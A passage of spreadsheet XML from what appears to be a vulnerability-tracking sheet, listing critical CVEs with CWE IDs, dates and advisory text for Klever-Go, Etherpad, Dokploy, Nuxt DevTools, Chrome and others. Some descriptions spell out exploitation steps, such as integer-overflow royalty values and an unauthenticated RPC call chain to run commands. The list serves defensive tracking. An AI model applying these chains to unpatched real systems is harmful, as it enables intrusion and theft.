      <c r="E306" s="5" t="inlineStr"/>
      <c r="F306" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="inlineStr"/>
      <c r="I306" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367, CWE-682</t>
        </is>
      </c>
      <c r="L306" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, marketplace settlement in core/kapp/market/market.go reads MarketOrderData.ReferralPercentage from the listing while reading asset.Royalties.MarketPercentage live at purchase time. An asset owner can create a valid listing and then use AssetTrigger UpdateRoyalties to make the combined referral and royalty percentages exceed the bid. executeBuyMarket pays referral and royalty amounts unconditionally while computeMarketOwnerAmount silently skips a nonpositive seller remainder, allowing MarketBuy, BuyItNow, or auction Claim settlement to credit more KLV or sale currency than the buyer paid. This can create unbacked currency and corrupt token supply integrity. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="M306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54754</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54755</t>
        </is>
      </c>
      <c r="C307" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D307" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E307" s="5" t="inlineStr"/>
      <c r="F307" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="inlineStr"/>
      <c r="I307" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L307" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, split-royalty fields decoded in core/kapp/builtInFunctions/utils.go can contain values greater than core.HundredPercent, and core/kapp/kda/create.go and core/kapp/kda/trigger.go sum those values in uint32 accumulators. Crafted values such as two 0x80000000 entries wrap the validation sum to zero and pass CheckValid100Params. Royalty payout paths in core/kapp/accounts/accounts.go, core/kapp/market/market.go, and core/kapp/ito/ito.go then credit each oversized split amount and silently discard a negative remainder, allowing ordinary asset transfers, marketplace purchases, or ITO purchases to create unbacked KLV or other assets. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="M307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54755</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55085</t>
        </is>
      </c>
      <c r="C308" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D308" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E308" s="5" t="inlineStr"/>
      <c r="F308" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="inlineStr"/>
      <c r="I308" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L308" s="5" t="inlineStr">
        <is>
          <t>Etherpad is a real-time collaborative editor. Prior to 3.3.1, result.appendSpan in src/static/js/domline.ts interpolates the start attribute of a numbered list directly into an unquoted ol start attribute before assigning the generated markup to node.innerHTML. ImportEtherpad.setPadRaw in src/node/utils/ImportEtherpad.ts accepts attacker-controlled attribute-pool values from a crafted .etherpad import, including list:number1 and a malicious start value. Any user with write access to a pad can store markup that executes as cross-site scripting when another user opens the pad or /timeslider, including when an administrator views the pad. This issue is fixed in version 3.3.1.</t>
        </is>
      </c>
      <c r="M308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55085</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65669</t>
        </is>
      </c>
      <c r="C309" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D309" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E309" s="5" t="inlineStr"/>
      <c r="F309" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="inlineStr"/>
      <c r="I309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L309" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in output used by a downstream component ('injection') in SQL Server allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65669</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71193</t>
        </is>
      </c>
      <c r="C310" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D310" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E310" s="5" t="inlineStr"/>
      <c r="F310" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="inlineStr"/>
      <c r="I310" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L310" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Designate before 22.0.1, zone creation checks (_is_subzone, _is_superzone, and the duplicate-zone DB constraint) are scoped to the target pool only. An authenticated user can bypass these checks by scheduling a zone to a different pool via the AttributeFilter scheduler, creating an overlapping zone that conflicts with another tenant's zone. This enables cross-tenant DNS hijack (redirecting traffic to attacker-controlled IPs) and DNS denial of service (NODATA responses). Exploitation requires a multi-pool deployment with AttributeFilter enabled in scheduler_filters, which is a non-default but documented and supported configuration for self-service tiering.</t>
        </is>
      </c>
      <c r="M310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71193</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71319</t>
        </is>
      </c>
      <c r="C311" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D311" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E311" s="5" t="inlineStr"/>
      <c r="F311" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="inlineStr"/>
      <c r="I311" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J311" s="5" t="inlineStr"/>
      <c r="K311" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-94</t>
        </is>
      </c>
      <c r="L311" s="5" t="inlineStr">
        <is>
          <t>Nuxt is an open-source web development framework for Vue.js. Prior to 3.3.1, Nuxt DevTools (development mode only) exposes a bidirectional RPC channel over the Vite HMR WebSocket via the nuxt:devtools:rpc plugin. On affected versions the channel has no authentication: any client that can reach the Vite HMR endpoint (ws://&lt;host&gt;:&lt;port&gt;/, subprotocol vite-hmr) can call RPC methods, with no token, handshake, or origin check before the channel is established. The updateOptions(), clearOptions(), and openInEditor() methods do not enforce the ensureDevAuthToken check that the other mutating methods use. openInEditor() reads the persisted behavior.openInEditor value and passes it to the launch-editor package, which spawns it as a child process. That value is settable through the equally unauthenticated updateOptions(). An attacker who can reach the HMR port can therefore chain updateOptions('behavior', { openInEditor: '&lt;command&gt;' }) then openInEditor('&lt;any-existing-file&gt;') to execute an arbitrary program on the developer's machine. This issue is fixed in 3.3.1.</t>
        </is>
      </c>
      <c r="M311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71319</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72737</t>
        </is>
      </c>
      <c r="C312" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D312" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E312" s="5" t="inlineStr"/>
      <c r="F312" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="inlineStr"/>
      <c r="I312" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J312" s="5" t="inlineStr"/>
      <c r="K312" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L312" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.29.8 and earlier, backup.create, backup.update, and backup.restoreBackupWithLogs in apps/dokploy/server/api/routers/backup.ts accept a client-controlled destinationId and use the referenced destination without verifying that destination.organizationId equals ctx.session.activeOrganizationId. An authenticated member with backup permissions for a service in one organization can cause another organization's S3 accessKey and secretAccessKey to be materialized by packages/server/src/utils/backups/utils.ts getS3Credentials on the attacker's service host, read that organization's backup objects, or redirect and poison backups across tenant boundaries.</t>
        </is>
      </c>
      <c r="M312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72737</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72877</t>
        </is>
      </c>
      <c r="C313" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D313" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E313" s="5" t="inlineStr"/>
      <c r="F313" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G313" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H313" s="5" t="inlineStr"/>
      <c r="I313" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L313" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the dockerImage field is interpolated without quoting into shell commands in buildRemoteDocker() in packages/server/src/utils/providers/docker.ts and is validated only as an optional string. An authenticated user with application create or update permission can use shell command substitution in dockerImage to execute arbitrary commands on the local build host or a remote SSH build target, exposing host secrets and other projects. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72877</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72878</t>
        </is>
      </c>
      <c r="C314" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D314" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E314" s="5" t="inlineStr"/>
      <c r="F314" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="inlineStr"/>
      <c r="I314" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L314" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, Dokploy's backup and restore pipeline constructs shell commands by directly interpolating user-controlled database fields into bash -c "..." and sh -c "..." strings, then executes them via child_process.exec(). An authenticated admin/owner can inject arbitrary OS commands that execute on the host machine running Dokploy (not just inside a container). This vulnerability is fixed in 0.29.13.</t>
        </is>
      </c>
      <c r="M314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72878</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73300</t>
        </is>
      </c>
      <c r="C315" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D315" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E315" s="5" t="inlineStr"/>
      <c r="F315" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G315" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H315" s="5" t="inlineStr"/>
      <c r="I315" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J315" s="5" t="inlineStr"/>
      <c r="K315" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L315" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.40.0, the MySQL integration component in Budibase is configured with multipleStatements: true, enabling execution of multiple SQL statements in a single query. Attackers can inject malicious SQL commands through user input fields, leading to complete database compromise. This vulnerability is fixed in 3.40.0.</t>
        </is>
      </c>
      <c r="M315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73300</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73843</t>
        </is>
      </c>
      <c r="C316" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D316" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E316" s="5" t="inlineStr"/>
      <c r="F316" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G316" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H316" s="5" t="inlineStr"/>
      <c r="I316" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-668, CWE-862</t>
        </is>
      </c>
      <c r="L316" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a complete, open-source developer platform for Kubernetes. Prior to 1.0.2 and 1.1.2, internal/cluster-gateway/server.go served caller-facing management APIs on the externally reachable agent listener without authentication, allowing network-reachable attackers to invoke /api/proxy/ and /api/exec/ operations, proxy the data-plane Kubernetes API, and execute commands in workload pods in multi-cluster deployments. This issue is fixed in versions 1.0.2 and 1.1.2.</t>
        </is>
      </c>
      <c r="M316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73843</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81048</t>
        </is>
      </c>
      <c r="C317" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D317" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E317" s="5" t="inlineStr"/>
      <c r="F317" s="5" t="inlineStr"/>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="inlineStr"/>
      <c r="I317" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L317" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10.2616, contain an Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability. An unauthenticated attacker with adjacent network access could potentially exploit this vulnerability, leading to Remote Code execution</t>
        </is>
      </c>
      <c r="M317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81048</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81376</t>
        </is>
      </c>
      <c r="C318" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D318" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E318" s="5" t="inlineStr"/>
      <c r="F318" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="inlineStr"/>
      <c r="I318" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr">
        <is>
          <t>CWE-1023, CWE-693</t>
        </is>
      </c>
      <c r="L318" s="5" t="inlineStr">
        <is>
          <t>Incomplete comparison with missing factors in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81376</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82100</t>
        </is>
      </c>
      <c r="C319" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D319" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E319" s="5" t="inlineStr"/>
      <c r="F319" s="5" t="inlineStr"/>
      <c r="G319" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H319" s="5" t="inlineStr"/>
      <c r="I319" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J319" s="5" t="inlineStr"/>
      <c r="K319" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L319" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to cause a denial of service due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="M319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82100</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82107</t>
        </is>
      </c>
      <c r="C320" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D320" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E320" s="5" t="inlineStr"/>
      <c r="F320" s="5" t="inlineStr"/>
      <c r="G320" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H320" s="5" t="inlineStr"/>
      <c r="I320" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L320" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to obtain sensitive information and bypass security restrictions due to improper authentication.</t>
        </is>
      </c>
      <c r="M320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82107</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84333</t>
        </is>
      </c>
      <c r="C321" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D321" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E321" s="5" t="inlineStr"/>
      <c r="F321" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I321" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J321" s="5" t="inlineStr"/>
      <c r="K321" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L321" s="5" t="inlineStr">
        <is>
          <t>Use after free in Dawn in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84333</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84352</t>
        </is>
      </c>
      <c r="C322" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D322" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E322" s="5" t="inlineStr"/>
      <c r="F322" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I322" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J322" s="5" t="inlineStr"/>
      <c r="K322" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L322" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebGL in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="M322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84352</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84353</t>
        </is>
      </c>
      <c r="C323" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D323" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E323" s="5" t="inlineStr"/>
      <c r="F323" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I323" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L323" s="5" t="inlineStr">
        <is>
          <t>Use after free in Shared Tab Groups in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker leveraging social engineering to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="M323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84353</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85042</t>
        </is>
      </c>
      <c r="C324" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D324" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E324" s="5" t="inlineStr"/>
      <c r="F324" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I324" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L324" s="5" t="inlineStr">
        <is>
          <t>Use after free in DevTools in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85042</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85047</t>
        </is>
      </c>
      <c r="C325" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D325" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E325" s="5" t="inlineStr"/>
      <c r="F325" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="inlineStr">
        <is>
          <t>apple:iphone_os, google:chrome</t>
        </is>
      </c>
      <c r="I325" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L325" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Transactions Platform in Google Chrome on on iOS prior to 152.0.7977.82 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85047</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85050</t>
        </is>
      </c>
      <c r="C326" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D326" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E326" s="5" t="inlineStr"/>
      <c r="F326" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I326" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L326" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in WebGL in Google Chrome on on Android prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85050</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85085</t>
        </is>
      </c>
      <c r="C327" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D327" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E327" s="5" t="inlineStr"/>
      <c r="F327" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="inlineStr"/>
      <c r="I327" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J327" s="5" t="inlineStr"/>
